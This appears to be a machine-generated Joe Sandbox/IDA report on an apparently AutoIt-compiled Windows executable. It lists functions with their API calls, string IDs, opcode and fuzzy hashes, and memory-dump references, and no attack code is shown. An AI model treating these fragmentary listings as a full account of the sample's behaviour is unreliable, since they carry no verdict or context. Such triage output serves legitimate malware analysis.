                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$BuffCharUpper
                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                  • API String ID: 1256254125-769500911
                                  • Opcode ID: 98d741feae058c265b4c99a2657b382496dada981afa0cae052170c876dfca31
                                  • Instruction ID: 6406106d53ceccd83896817ee957e4fa14409bb95f60e2db2f38e6fc4d03624b
                                  • Opcode Fuzzy Hash: 98d741feae058c265b4c99a2657b382496dada981afa0cae052170c876dfca31
                                  • Instruction Fuzzy Hash: CF412932A000268BCB215F7DCC916FEF7A5AF6075CB26412AE621DB680EF75CD81C390
                                  Function 003C5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 003C53A0
                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003C5416
                                  • GetLastError.KERNEL32 ref: 003C5420
                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 003C54A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Error$Mode$DiskFreeLastSpace
                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                  • API String ID: 4194297153-14809454
                                  • Opcode ID: f23fe9c8697665e0b8dec53cca974345f02e561afb64fd9e92d68e7699158be1
                                  • Instruction ID: 6e790f37b93f305814382b3d7ef23742146449a5f5c78768d9fa41091c84cf65
                                  • Opcode Fuzzy Hash: f23fe9c8697665e0b8dec53cca974345f02e561afb64fd9e92d68e7699158be1
                                  • Instruction Fuzzy Hash: AF318135A006049FC716DF69C884FA97BB8EB45305F15805AE805CF2A2DB75EDC6CB90
                                  Function 003E3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003E3A9D
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003E3AA0
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003E3AC7
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E3AEA
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003E3B62
                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 003E3BAC
                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 003E3BC7
                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 003E3BE2
                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 003E3BF6
                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003E3C13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow
                                  • String ID:
                                  • API String ID: 312131281-0
                                  • Opcode ID: 72ad94f45a4ac72a717ae4c5013ebacbc29bb5ba8df85641bef2b0d2ca593304
                                  • Instruction ID: abcbf7fe730560b455e5912d8f896e274e1e52814d153af37a28b77a0da4b702
                                  • Opcode Fuzzy Hash: 72ad94f45a4ac72a717ae4c5013ebacbc29bb5ba8df85641bef2b0d2ca593304
                                  • Instruction Fuzzy Hash: 35616D75A00258AFDB21DFA4CC85EEE77B8EB09700F104199FA15AB2E1C774AE45DB50
                                  Function 003BB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 003BB151
                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003BA1E1,?,00000001), ref: 003BB165
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 003BB16C
                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003BA1E1,?,00000001), ref: 003BB17B
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 003BB18D
                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003BA1E1,?,00000001), ref: 003BB1A6
                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003BA1E1,?,00000001), ref: 003BB1B8
                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003BA1E1,?,00000001), ref: 003BB1FD
                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003BA1E1,?,00000001), ref: 003BB212
                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003BA1E1,?,00000001), ref: 003BB21D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                  • String ID:
                                  • API String ID: 2156557900-0
                                  • Opcode ID: db8a7884c2403e670674538fe6048633231d79f28533c5b7660571f12ec42579
                                  • Instruction ID: efe26dcdc206ac30751caba8b333889fe51b29a0fd8d73e1192e3e0cf5b6b701
                                  • Opcode Fuzzy Hash: db8a7884c2403e670674538fe6048633231d79f28533c5b7660571f12ec42579
                                  • Instruction Fuzzy Hash: 0831AE71710204AFDB229F24DC88FAEBBBDBB5031AF154514FA10DA590DBB89E028F74
                                  Function 00382C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00382C94
                                    • Part of subcall function 003829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000), ref: 003829DE
                                    • Part of subcall function 003829C8: GetLastError.KERNEL32(00000000,?,0038D7D1,00000000,00000000,00000000,00000000,?,0038D7F8,00000000,00000007,00000000,?,0038DBF5,00000000,00000000), ref: 003829F0
                                  • _free.LIBCMT ref: 00382CA0
                                  • _free.LIBCMT ref: 00382CAB
                                  • _free.LIBCMT ref: 00382CB6
                                  • _free.LIBCMT ref: 00382CC1
                                  • _free.LIBCMT ref: 00382CCC
                                  • _free.LIBCMT ref: 00382CD7
                                  • _free.LIBCMT ref: 00382CE2
                                  • _free.LIBCMT ref: 00382CED
                                  • _free.LIBCMT ref: 00382CFB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 038ba20d79119572bbfb8633a8a95cdec72808198dddc935fc77dd4ee94c56a0
                                  • Instruction ID: 202c6312569819c4d8c9462852a4cd003364ac68207a4ad6083dea4917345bb1
                                  • Opcode Fuzzy Hash: 038ba20d79119572bbfb8633a8a95cdec72808198dddc935fc77dd4ee94c56a0
                                  • Instruction Fuzzy Hash: 7B116376500208AFCB03FF55D982CDE3BA5FF06350F5245A5FA489F222DB35EA609B90
                                  Function 00351410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00351459
                                  • OleUninitialize.OLE32(?,00000000), ref: 003514F8
                                  • UnregisterHotKey.USER32(?), ref: 003516DD
                                  • DestroyWindow.USER32(?), ref: 003924B9
                                  • FreeLibrary.KERNEL32(?), ref: 0039251E
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0039254B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                  • String ID: close all
                                  • API String ID: 469580280-3243417748
                                  • Opcode ID: fab85555893c9ab8845b801681eddad8a97150d3b968165b361c2ecbfde135b0
                                  • Instruction ID: 71c60206580c0323cdd3e3e5a1e114beccc56d9780f8c8191ddd504197edf125
                                  • Opcode Fuzzy Hash: fab85555893c9ab8845b801681eddad8a97150d3b968165b361c2ecbfde135b0
                                  • Instruction Fuzzy Hash: 1DD16A317016129FCB2AEF15C495F29F7A4BF05701F1586ADE84AAB262DB31AC16CF50
                                  Function 00355BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowLongW.USER32(?,000000EB), ref: 00355C7A
                                    • Part of subcall function 00355D0A: GetClientRect.USER32(?,?), ref: 00355D30
                                    • Part of subcall function 00355D0A: GetWindowRect.USER32(?,?), ref: 00355D71
                                    • Part of subcall function 00355D0A: ScreenToClient.USER32(?,?), ref: 00355D99
                                  • GetDC.USER32 ref: 003946F5
                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00394708
                                  • SelectObject.GDI32(00000000,00000000), ref: 00394716
                                  • SelectObject.GDI32(00000000,00000000), ref: 0039472B
                                  • ReleaseDC.USER32(?,00000000), ref: 00394733
                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003947C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                  • String ID: U
                                  • API String ID: 4009187628-3372436214
                                  • Opcode ID: 98360c9078f5d74a50aac94fbbee61a6ec57394e4dab787dd25bd256172345cc
                                  • Instruction ID: 8d10ced4192a04037c1eda9169d2c988a9a09c2b3e61a3229cc3c965182c95ad
                                  • Opcode Fuzzy Hash: 98360c9078f5d74a50aac94fbbee61a6ec57394e4dab787dd25bd256172345cc
                                  • Instruction Fuzzy Hash: 8A71D231500209DFCF238FA4C984EBA7BB9FF4A365F154269ED655A2A6C3319C42DF50
                                  Function 003C359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003C35E4
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • LoadStringW.USER32(00422390,?,00000FFF,?), ref: 003C360A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: LoadString$_wcslen
                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 4099089115-2391861430
                                  • Opcode ID: e61374ce02c7ea6802bbda380e6e2a1980f13640e174fedeed0ff6198962fd63
                                  • Instruction ID: 2b26a0c4820677b0fa5f84f2060ce964c7086bbb60665bf784c461f5b05b7107
                                  • Opcode Fuzzy Hash: e61374ce02c7ea6802bbda380e6e2a1980f13640e174fedeed0ff6198962fd63
                                  • Instruction Fuzzy Hash: 3E51A072900209BADF16EBA0CC42FEDBB39EF14341F544126F905760B1EB315A99DFA4
                                  Function 003CC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003CC272
                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003CC29A
                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003CC2CA
                                  • GetLastError.KERNEL32 ref: 003CC322
                                  • SetEvent.KERNEL32(?), ref: 003CC336
                                  • InternetCloseHandle.WININET(00000000), ref: 003CC341
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                  • String ID:
                                  • API String ID: 3113390036-3916222277
                                  • Opcode ID: 9e790b5f1c701855b1101ff201ea642209bd2053601d22fda2021cd3b50ee622
                                  • Instruction ID: cc2525aaabaf235a18b5dc60255471dd65dcc1443f92b5dbc6a40e435cf3f66c
                                  • Opcode Fuzzy Hash: 9e790b5f1c701855b1101ff201ea642209bd2053601d22fda2021cd3b50ee622
                                  • Instruction Fuzzy Hash: 9131ADB5520244AFDB329F649C88FAB7BFCEB49740F04951EF44AD6240DB35DD058B60
                                  Function 003B989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00393AAF,?,?,Bad directive syntax error,003ECC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003B98BC
                                  • LoadStringW.USER32(00000000,?,00393AAF,?), ref: 003B98C3
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003B9987
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: HandleLoadMessageModuleString_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                  • API String ID: 858772685-4153970271
                                  • Opcode ID: 4b2ddfb656e8fcd671453c502aeb16857fb8cd4ca595d5a4c4c7f3641e67cff3
                                  • Instruction ID: b1ae5f6e376efead9a6eb3f0d035ab6fdb9f619735576d6e21a0a5f7b0601cab
                                  • Opcode Fuzzy Hash: 4b2ddfb656e8fcd671453c502aeb16857fb8cd4ca595d5a4c4c7f3641e67cff3
                                  • Instruction Fuzzy Hash: E3217E3190021EEBCF12AF90CC06FEE7739FF18305F04446AFA156A0A2EB759658CB50
                                  Function 003B209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetParent.USER32 ref: 003B20AB
                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 003B20C0
                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003B214D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ClassMessageNameParentSend
                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 1290815626-3381328864
                                  • Opcode ID: d68cfa56ef7c85d49297df0ffe14217cddd93847281a75dc86e74361d8b87e96
                                  • Instruction ID: 21c3ddfd97fedec30459fb1488f05e3493481d499eebe4ef612bbaaad03d484a
                                  • Opcode Fuzzy Hash: d68cfa56ef7c85d49297df0ffe14217cddd93847281a75dc86e74361d8b87e96
                                  • Instruction Fuzzy Hash: 18112976688706B9F6232224DC07EEB779CDB54328F314217FB08E94D2FF6978525A18
                                  Function 0038CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                  • String ID:
                                  • API String ID: 1282221369-0
                                  • Opcode ID: 059903e8e7c3af3d248de8118f35a03fb0bd6085555c8e850d5994bc560ae009
                                  • Instruction ID: 664a882d0a093680eed229bd889902f57bc79d29705580100014bac40306fb4b
                                  • Opcode Fuzzy Hash: 059903e8e7c3af3d248de8118f35a03fb0bd6085555c8e850d5994bc560ae009
                                  • Instruction Fuzzy Hash: 63611B71A15301AFEF33BFB49841A6A7BE9EF05310F5641EEFA449B282D7359D028760
                                  Function 003E50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 003E5186
                                  • ShowWindow.USER32(?,00000000), ref: 003E51C7
                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 003E51CD
                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 003E51D1
                                    • Part of subcall function 003E6FBA: DeleteObject.GDI32(00000000), ref: 003E6FE6
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003E520D
                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003E521A
                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003E524D
                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 003E5287
                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 003E5296
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                  • String ID:
                                  • API String ID: 3210457359-0
                                  • Opcode ID: 085dc5ef1c6a98277e6ba6b53ffc19d6d434aac149971800e44e35977a8cff69
                                  • Instruction ID: c64124cd20304db734d7eb7c40dbef4ea1c94a6b61fdee1d8e9795647968e389
                                  • Opcode Fuzzy Hash: 085dc5ef1c6a98277e6ba6b53ffc19d6d434aac149971800e44e35977a8cff69
                                  • Instruction Fuzzy Hash: A451D730A50AA8BFEF329F26CC45BD93B69FB05329F158711F6159A3E1C3759980DB40
                                  Function 00368B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 003A6890
                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003A68A9
